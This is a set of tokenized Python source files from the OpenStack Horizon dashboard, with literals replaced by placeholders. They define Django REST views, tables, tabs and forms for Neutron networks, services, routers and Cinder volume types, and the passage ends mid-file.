<s> """<STR_LIT>""" <EOL> from django . views import generic <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . api . rest import urls <EOL> from openstack_dashboard . api . rest import utils as rest_utils <EOL> @ urls . register <EOL> class Networks ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> tenant_id = request . user . tenant_id <EOL> result = api . neutron . network_list_for_tenant ( request , tenant_id ) <EOL> return { '<STR_LIT>' : [ n . to_dict ( ) for n in result ] } <EOL> @ rest_utils . ajax ( data_required = True ) <EOL> def post ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if not api . neutron . is_port_profiles_supported ( ) : <EOL> request . DATA . pop ( "<STR_LIT>" , None ) <EOL> new_network = api . neutron . network_create ( request , ** request . DATA ) <EOL> return rest_utils . CreatedResponse ( <EOL> '<STR_LIT>' % new_network . id , <EOL> new_network . to_dict ( ) <EOL> ) <EOL> @ urls . register <EOL> class Subnets ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> result = api . neutron . subnet_list ( request , ** request . GET ) <EOL> return { '<STR_LIT>' : [ n . to_dict ( ) for n in result ] } <EOL> @ rest_utils . ajax ( data_required = True ) <EOL> def post ( self , request ) : <EOL> """<STR_LIT>""" <EOL> new_subnet = api . neutron . subnet_create ( request , ** request . DATA ) <EOL> return rest_utils . CreatedResponse ( <EOL> '<STR_LIT>' % new_subnet . id , <EOL> new_subnet . to_dict ( ) <EOL> ) <EOL> @ urls . register <EOL> class Ports ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> result = api . neutron . port_list ( request , ** request . GET ) <EOL> return { '<STR_LIT>' : [ n . to_dict ( ) for n in result ] } <EOL> @ urls . register <EOL> class Services ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if api . base . is_service_enabled ( request , '<STR_LIT>' ) and api . neutron . is_extension_supported ( request , '<STR_LIT>' ) : <EOL> result = api . neutron . agent_list ( request , ** request . GET ) <EOL> return { '<STR_LIT>' : [ n . to_dict ( ) for n in result ] } <EOL> else : <EOL> raise rest_utils . AjaxError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> @ urls . register <EOL> class Extensions ( generic . View ) : <EOL> """<STR_LIT>""" <EOL> url_regex = r'<STR_LIT>' <EOL> @ rest_utils . ajax ( ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> result = api . neutron . list_extensions ( request ) <EOL> return { '<STR_LIT>' : [ e for e in result ] } </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tabs <EOL> from horizon import workflows <EOL> from openstack_dashboard . dashboards . admin . defaults import tabs as project_tabs <EOL> from openstack_dashboard . dashboards . admin . defaults import workflows as project_workflows <EOL> from openstack_dashboard . usage import quotas <EOL> class IndexView ( tabs . TabbedTableView ) : <EOL> tab_group_class = project_tabs . DefaultsTabs <EOL> template_name = '<STR_LIT>' <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> class UpdateDefaultQuotasView ( workflows . WorkflowView ) : <EOL> workflow_class = project_workflows . UpdateDefaultQuotas <EOL> def get_initial ( self ) : <EOL> initial = super ( UpdateDefaultQuotasView , self ) . get_initial ( ) <EOL> try : <EOL> quota_defaults = quotas . get_default_quota_data ( self . request ) <EOL> for field in ( quotas . QUOTA_FIELDS + quotas . MISSING_QUOTA_FIELDS ) : <EOL> initial [ field ] = quota_defaults . get ( field ) . limit <EOL> except Exception : <EOL> error_msg = _ ( '<STR_LIT>' ) <EOL> self . add_error_to_step ( error_msg , '<STR_LIT>' ) <EOL> return initial </s>
<s> from django import template <EOL> from django . template import defaultfilters as filters <EOL> from django . utils . translation import pgettext_lazy <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tables <EOL> from horizon . utils import filters as utils_filters <EOL> SERVICE_ENABLED = "<STR_LIT>" <EOL> SERVICE_DISABLED = "<STR_LIT>" <EOL> SERVICE_STATUS_DISPLAY_CHOICES = ( <EOL> ( SERVICE_ENABLED , _ ( "<STR_LIT>" ) ) , <EOL> ( SERVICE_DISABLED , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> SERVICE_STATE_DISPLAY_CHOICES = ( <EOL> ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) , <EOL> ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> class ServiceFilterAction ( tables . FilterAction ) : <EOL> filter_field = '<STR_LIT:type>' <EOL> def filter ( self , table , services , filter_string ) : <EOL> q = filter_string . lower ( ) <EOL> def comp ( service ) : <EOL> attr = getattr ( service , self . filter_field , '<STR_LIT>' ) <EOL> if attr is not None and q in attr . lower ( ) : <EOL> return True <EOL> return False <EOL> return filter ( comp , services ) <EOL> class SubServiceFilterAction ( ServiceFilterAction ) : <EOL> filter_field = '<STR_LIT>' <EOL> def get_status ( service ) : <EOL> if service . host : <EOL> return SERVICE_ENABLED if not service . disabled else SERVICE_DISABLED <EOL> return None <EOL> class ServicesTable ( tables . DataTable ) : <EOL> id = tables . Column ( '<STR_LIT:id>' , hidden = True ) <EOL> name = tables . Column ( "<STR_LIT:name>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> service_type = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> status = tables . Column ( get_status , <EOL> verbose_name = _ ( '<STR_LIT>' ) , <EOL> status = True , <EOL> display_choices = SERVICE_STATUS_DISPLAY_CHOICES ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( ServiceFilterAction , ) <EOL> multi_select = False <EOL> status_columns = [ "<STR_LIT:status>" ] <EOL> def get_available ( zone ) : <EOL> return zone . zoneState [ '<STR_LIT>' ] <EOL> def get_agent_status ( agent ) : <EOL> template_name = '<STR_LIT>' <EOL> context = { <EOL> '<STR_LIT:status>' : agent . status , <EOL> '<STR_LIT>' : agent . disabled_reason <EOL> } <EOL> return template . loader . render_to_string ( template_name , context ) <EOL> class NovaServicesTable ( tables . DataTable ) : <EOL> binary = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> zone = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> status = tables . Column ( get_agent_status , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> state = tables . Column ( '<STR_LIT:state>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> display_choices = SERVICE_STATE_DISPLAY_CHOICES ) <EOL> updated_at = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = pgettext_lazy ( <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' ) , <EOL> filters = ( utils_filters . parse_isotime , <EOL> filters . timesince ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return "<STR_LIT>" % ( obj . binary , obj . host , obj . zone ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( SubServiceFilterAction , ) <EOL> multi_select = False <EOL> class CinderServicesTable ( tables . DataTable ) : <EOL> binary = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> zone = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> status = tables . Column ( get_agent_status , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> state = tables . Column ( '<STR_LIT:state>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> display_choices = SERVICE_STATE_DISPLAY_CHOICES ) <EOL> updated_at = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = pgettext_lazy ( <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' ) , <EOL> filters = ( utils_filters . parse_isotime , <EOL> filters . timesince ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return "<STR_LIT>" % ( obj . binary , obj . host , obj . zone ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( SubServiceFilterAction , ) <EOL> multi_select = False <EOL> class NetworkAgentsFilterAction ( tables . FilterAction ) : <EOL> def filter ( self , table , agents , filter_string ) : <EOL> q = filter_string . lower ( ) <EOL> def comp ( agent ) : <EOL> if q in agent . agent_type . lower ( ) : <EOL> return True <EOL> return False <EOL> return filter ( comp , agents ) <EOL> def get_network_agent_status ( agent ) : <EOL> if agent . admin_state_up : <EOL> return _ ( '<STR_LIT>' ) <EOL> return _ ( '<STR_LIT>' ) <EOL> def get_network_agent_state ( agent ) : <EOL> if agent . alive : <EOL> return _ ( '<STR_LIT>' ) <EOL> return _ ( '<STR_LIT>' ) <EOL> class NetworkAgentsTable ( tables . DataTable ) : <EOL> agent_type = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> binary = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> status = tables . Column ( get_network_agent_status , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> state = tables . Column ( get_network_agent_state , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> heartbeat_timestamp = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = pgettext_lazy ( <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' ) , <EOL> filters = ( utils_filters . parse_isotime , <EOL> filters . timesince ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return "<STR_LIT>" % ( obj . binary , obj . host ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( NetworkAgentsFilterAction , ) <EOL> multi_select = False <EOL> class HeatServiceFilterAction ( tables . FilterAction ) : <EOL> filter_field = '<STR_LIT:type>' <EOL> def filter ( self , table , services , filter_string ) : <EOL> q = filter_string . lower ( ) <EOL> def comp ( service ) : <EOL> attr = getattr ( service , self . filter_field , '<STR_LIT>' ) <EOL> if attr is not None and q in attr . lower ( ) : <EOL> return True <EOL> return False <EOL> return filter ( comp , services ) <EOL> class HeatServiceTable ( tables . DataTable ) : <EOL> hostname = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> binary = tables . Column ( "<STR_LIT>" , verbose_name = _ ( '<STR_LIT:Name>' ) ) <EOL> engine_id = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> host = tables . Column ( '<STR_LIT:host>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> topic = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> state = tables . Column ( '<STR_LIT:status>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> display_choices = SERVICE_STATE_DISPLAY_CHOICES ) <EOL> updated_at = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = pgettext_lazy ( <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' ) , <EOL> filters = ( utils_filters . parse_isotime , <EOL> filters . timesince ) ) <EOL> def get_object_id ( self , obj ) : <EOL> return "<STR_LIT:%s>" % obj . engine_id <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> table_actions = ( HeatServiceFilterAction , ) <EOL> multi_select = False </s>
<s> import logging <EOL> from django . conf import settings <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import messages <EOL> from openstack_dashboard import api <EOL> LOG = logging . getLogger ( __name__ ) <EOL> PROVIDER_TYPES = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> } <EOL> SEGMENTATION_ID_RANGE = { <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ( <NUM_LIT:2> ** <NUM_LIT:32> ) - <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ( <NUM_LIT:2> ** <NUM_LIT> ) - <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ( <NUM_LIT:2> ** <NUM_LIT> ) - <NUM_LIT:1> ) , <EOL> } <EOL> DEFAULT_PROVIDER_TYPES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class CreateNetwork ( forms . SelfHandlingForm ) : <EOL> name = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> label = _ ( "<STR_LIT:Name>" ) , <EOL> required = False ) <EOL> tenant_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> widget = None <EOL> else : <EOL> widget = forms . HiddenInput ( ) <EOL> net_profile_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = widget ) <EOL> network_type = forms . ChoiceField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> widget = forms . Select ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) ) <EOL> physical_network = forms . CharField ( <EOL> max_length = <NUM_LIT:255> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> initial = '<STR_LIT:default>' , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) ) <EOL> segmentation_id = forms . IntegerField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) ) <EOL> admin_state = forms . ChoiceField ( choices = [ ( True , _ ( '<STR_LIT>' ) ) , <EOL> ( False , _ ( '<STR_LIT>' ) ) ] , <EOL> label = _ ( "<STR_LIT>" ) ) <EOL> shared = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = False , required = False ) <EOL> external = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = False , required = False ) <EOL> @ classmethod <EOL> def _instantiate ( cls , request , * args , ** kwargs ) : <EOL> return cls ( request , * args , ** kwargs ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( CreateNetwork , self ) . __init__ ( request , * args , ** kwargs ) <EOL> tenant_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> tenants , has_more = api . keystone . tenant_list ( request ) <EOL> for tenant in tenants : <EOL> if tenant . enabled : <EOL> tenant_choices . append ( ( tenant . id , tenant . name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = tenant_choices <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> self . fields [ '<STR_LIT>' ] . choices = ( <EOL> self . get_network_profile_choices ( request ) ) <EOL> if api . neutron . is_extension_supported ( request , '<STR_LIT>' ) : <EOL> neutron_settings = getattr ( settings , <EOL> '<STR_LIT>' , { } ) <EOL> self . seg_id_range = SEGMENTATION_ID_RANGE . copy ( ) <EOL> seg_id_range = neutron_settings . get ( '<STR_LIT>' ) <EOL> if seg_id_range : <EOL> self . seg_id_range . update ( seg_id_range ) <EOL> self . provider_types = PROVIDER_TYPES . copy ( ) <EOL> extra_provider_types = neutron_settings . get ( '<STR_LIT>' ) <EOL> if extra_provider_types : <EOL> self . provider_types . update ( extra_provider_types ) <EOL> self . nettypes_with_seg_id = [ <EOL> net_type for net_type in self . provider_types <EOL> if self . provider_types [ net_type ] [ '<STR_LIT>' ] ] <EOL> self . nettypes_with_physnet = [ <EOL> net_type for net_type in self . provider_types <EOL> if self . provider_types [ net_type ] [ '<STR_LIT>' ] ] <EOL> supported_provider_types = neutron_settings . get ( <EOL> '<STR_LIT>' , DEFAULT_PROVIDER_TYPES ) <EOL> if supported_provider_types == [ '<STR_LIT:*>' ] : <EOL> supported_provider_types = DEFAULT_PROVIDER_TYPES <EOL> undefined_provider_types = [ <EOL> net_type for net_type in supported_provider_types <EOL> if net_type not in self . provider_types ] <EOL> if undefined_provider_types : <EOL> LOG . error ( '<STR_LIT>' , <EOL> undefined_provider_types ) <EOL> seg_id_help = [ <EOL> _ ( "<STR_LIT>" ) <EOL> % { '<STR_LIT:type>' : net_type , <EOL> '<STR_LIT>' : self . seg_id_range [ net_type ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : self . seg_id_range [ net_type ] [ <NUM_LIT:1> ] } <EOL> for net_type in self . nettypes_with_seg_id ] <EOL> self . fields [ '<STR_LIT>' ] . help_text = '<STR_LIT:U+0020>' . join ( seg_id_help ) <EOL> attrs = dict ( ( '<STR_LIT>' % network_type , <EOL> _ ( '<STR_LIT>' ) ) <EOL> for network_type in self . nettypes_with_seg_id ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( attrs ) <EOL> attrs = dict ( ( '<STR_LIT>' % network_type , <EOL> _ ( '<STR_LIT>' ) ) <EOL> for network_type in self . nettypes_with_physnet ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( attrs ) <EOL> network_type_choices = [ <EOL> ( net_type , self . provider_types [ net_type ] [ '<STR_LIT>' ] ) <EOL> for net_type in supported_provider_types ] <EOL> if len ( network_type_choices ) == <NUM_LIT:0> : <EOL> self . _hide_provider_network_type ( ) <EOL> else : <EOL> self . fields [ '<STR_LIT>' ] . choices = network_type_choices <EOL> else : <EOL> self . _hide_provider_network_type ( ) <EOL> def get_network_profile_choices ( self , request ) : <EOL> profile_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> for profile in self . _get_profiles ( request , '<STR_LIT>' ) : <EOL> profile_choices . append ( ( profile . id , profile . name ) ) <EOL> return profile_choices <EOL> def _get_profiles ( self , request , type_p ) : <EOL> profiles = [ ] <EOL> try : <EOL> profiles = api . neutron . profile_list ( request , type_p ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( request , msg ) <EOL> return profiles <EOL> def _hide_provider_network_type ( self ) : <EOL> self . fields [ '<STR_LIT>' ] . widget = forms . HiddenInput ( ) <EOL> self . fields [ '<STR_LIT>' ] . widget = forms . HiddenInput ( ) <EOL> self . fields [ '<STR_LIT>' ] . widget = forms . HiddenInput ( ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> def handle ( self , request , data ) : <EOL> try : <EOL> params = { '<STR_LIT:name>' : data [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : ( data [ '<STR_LIT>' ] == '<STR_LIT:True>' ) , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] } <EOL> if api . neutron . is_port_profiles_supported ( ) : <EOL> params [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> if api . neutron . is_extension_supported ( request , '<STR_LIT>' ) : <EOL> network_type = data [ '<STR_LIT>' ] <EOL> params [ '<STR_LIT>' ] = network_type <EOL> if network_type in self . nettypes_with_physnet : <EOL> params [ '<STR_LIT>' ] = ( <EOL> data [ '<STR_LIT>' ] ) <EOL> if network_type in self . nettypes_with_seg_id : <EOL> params [ '<STR_LIT>' ] = ( <EOL> data [ '<STR_LIT>' ] ) <EOL> network = api . neutron . network_create ( request , ** params ) <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT:name>' ] <EOL> LOG . debug ( msg ) <EOL> messages . success ( request , msg ) <EOL> return network <EOL> except Exception : <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT:name>' ] <EOL> exceptions . handle ( request , msg , redirect = redirect ) <EOL> def clean ( self ) : <EOL> cleaned_data = super ( CreateNetwork , self ) . clean ( ) <EOL> if api . neutron . is_extension_supported ( self . request , '<STR_LIT>' ) : <EOL> self . _clean_physical_network ( cleaned_data ) <EOL> self . _clean_segmentation_id ( cleaned_data ) <EOL> return cleaned_data <EOL> def _clean_physical_network ( self , data ) : <EOL> network_type = data . get ( '<STR_LIT>' ) <EOL> if ( '<STR_LIT>' in self . _errors and <EOL> network_type not in self . nettypes_with_physnet ) : <EOL> del self . _errors [ '<STR_LIT>' ] <EOL> def _clean_segmentation_id ( self , data ) : <EOL> network_type = data . get ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . _errors : <EOL> if network_type not in self . nettypes_with_seg_id : <EOL> del self . _errors [ '<STR_LIT>' ] <EOL> elif network_type in self . nettypes_with_seg_id : <EOL> seg_id = data . get ( '<STR_LIT>' ) <EOL> seg_id_range = { '<STR_LIT>' : self . seg_id_range [ network_type ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : self . seg_id_range [ network_type ] [ <NUM_LIT:1> ] } <EOL> if seg_id < seg_id_range [ '<STR_LIT>' ] or seg_id > seg_id_range [ '<STR_LIT>' ] : <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> % { '<STR_LIT>' : network_type , <EOL> '<STR_LIT>' : seg_id_range [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : seg_id_range [ '<STR_LIT>' ] } ) <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( [ msg ] ) <EOL> class UpdateNetwork ( forms . SelfHandlingForm ) : <EOL> name = forms . CharField ( label = _ ( "<STR_LIT:Name>" ) , required = False ) <EOL> tenant_id = forms . CharField ( widget = forms . HiddenInput ) <EOL> network_id = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . TextInput ( <EOL> attrs = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> admin_state = forms . ChoiceField ( choices = [ ( True , _ ( '<STR_LIT>' ) ) , <EOL> ( False , _ ( '<STR_LIT>' ) ) ] , <EOL> label = _ ( "<STR_LIT>" ) ) <EOL> shared = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , required = False ) <EOL> external = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , required = False ) <EOL> failure_url = '<STR_LIT>' <EOL> def handle ( self , request , data ) : <EOL> try : <EOL> params = { '<STR_LIT:name>' : data [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : ( data [ '<STR_LIT>' ] == '<STR_LIT:True>' ) , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] } <EOL> network = api . neutron . network_update ( request , <EOL> self . initial [ '<STR_LIT>' ] , <EOL> ** params ) <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT:name>' ] <EOL> LOG . debug ( msg ) <EOL> messages . success ( request , msg ) <EOL> return network <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) % data [ '<STR_LIT:name>' ] <EOL> LOG . info ( msg ) <EOL> redirect = reverse ( self . failure_url ) <EOL> exceptions . handle ( request , msg , redirect = redirect ) </s>
<s> from openstack_dashboard . dashboards . admin . routers . extensions . extraroutes import tables as ertbl <EOL> from openstack_dashboard . dashboards . admin . routers . ports import tables as ptbl <EOL> from openstack_dashboard . dashboards . project . routers . extensions . extraroutes import tabs as er_tabs <EOL> from openstack_dashboard . dashboards . project . routers . extensions . routerrules import tabs as rr_tabs <EOL> from openstack_dashboard . dashboards . project . routers import tabs as r_tabs <EOL> class OverviewTab ( r_tabs . OverviewTab ) : <EOL> template_name = "<STR_LIT>" <EOL> class ExtraRoutesTab ( er_tabs . ExtraRoutesTab ) : <EOL> table_classes = ( ertbl . AdminRouterRoutesTable , ) <EOL> class InterfacesTab ( r_tabs . InterfacesTab ) : <EOL> table_classes = ( ptbl . PortsTable , ) <EOL> class RouterDetailTabs ( r_tabs . RouterDetailTabs ) : <EOL> tabs = ( OverviewTab , InterfacesTab , ExtraRoutesTab , rr_tabs . RulesGridTab , <EOL> rr_tabs . RouterRulesTab ) <EOL> sticky = True </s>
<s> """<STR_LIT>""" <EOL> from django . core . urlresolvers import reverse <EOL> from django . core . urlresolvers import reverse_lazy <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon . utils import memoized <EOL> from horizon import views <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . admin . volumes . volume_types import forms as volume_types_forms <EOL> class CreateVolumeTypeView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . CreateVolumeType <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = reverse_lazy ( "<STR_LIT>" ) <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> class VolumeTypeEncryptionDetailView ( views . HorizonTemplateView ) : <EOL> template_name = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( VolumeTypeEncryptionDetailView , self ) . get_context_data ( ** kwargs ) <EOL> context [ "<STR_LIT>" ] = self . get_data ( ) <EOL> return context <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_type_id = self . kwargs [ '<STR_LIT>' ] <EOL> self . _volume_type_encryption = api . cinder . volume_encryption_type_get ( self . request , volume_type_id ) <EOL> volume_type_list = api . cinder . volume_type_list ( self . request ) <EOL> for volume_type in volume_type_list : <EOL> if volume_type . id == volume_type_id : <EOL> self . name = volume_type . name <EOL> self . _volume_type_encryption . name = self . name <EOL> except Exception : <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return None <EOL> return self . _volume_type_encryption <EOL> class CreateVolumeTypeEncryptionView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . CreateVolumeTypeEncryption <EOL> form_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> @ memoized . memoized_method <EOL> def get_name ( self ) : <EOL> if not hasattr ( self , "<STR_LIT:name>" ) : <EOL> self . name = _get_volume_type_name ( self . request , self . kwargs ) <EOL> return self . name <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( CreateVolumeTypeEncryptionView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> args = ( self . kwargs [ 